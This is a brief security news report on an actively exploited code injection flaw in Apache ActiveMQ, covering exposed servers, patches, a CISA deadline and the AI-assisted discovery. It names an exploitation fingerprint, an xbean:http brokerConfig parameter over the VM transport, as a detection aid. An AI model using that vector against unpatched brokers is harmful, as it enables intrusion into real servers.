Apache ActiveMQ flaw exploited in the wild, 6,400 servers exposed

A 13-year-old code injection flaw in Apache ActiveMQ (CVE-2026-34197) is under active exploitation, with Shadowserver counting more than 6,400 exposed instances still unpatched. The bulk sit in Asia (2,925), North America (1,409), and Europe (1,334). Apache shipped fixes on March 30 in Classic 6.2.3 and 5.19.4, but deployment has clearly lagged.

The bug is an improper input validation weakness that lets authenticated attackers execute arbitrary code. It was surfaced by Horizon3 researcher Naveen Sunkavally working with Claude as an analysis assistant — notable because the defect survived over a decade of human review. Exploitation fingerprints include broker connections over the internal VM transport paired with a brokerConfig=xbean:http:// parameter.

CISA has added the CVE to its KEV catalog and given federal civilian agencies until April 30 to patch or pull the product. ActiveMQ has a track record as a ransomware target — TellYouThePass burned CVE-2023-46604 as a zero-day — so exposed brokers should be treated as imminent compromise candidates, not routine patch work.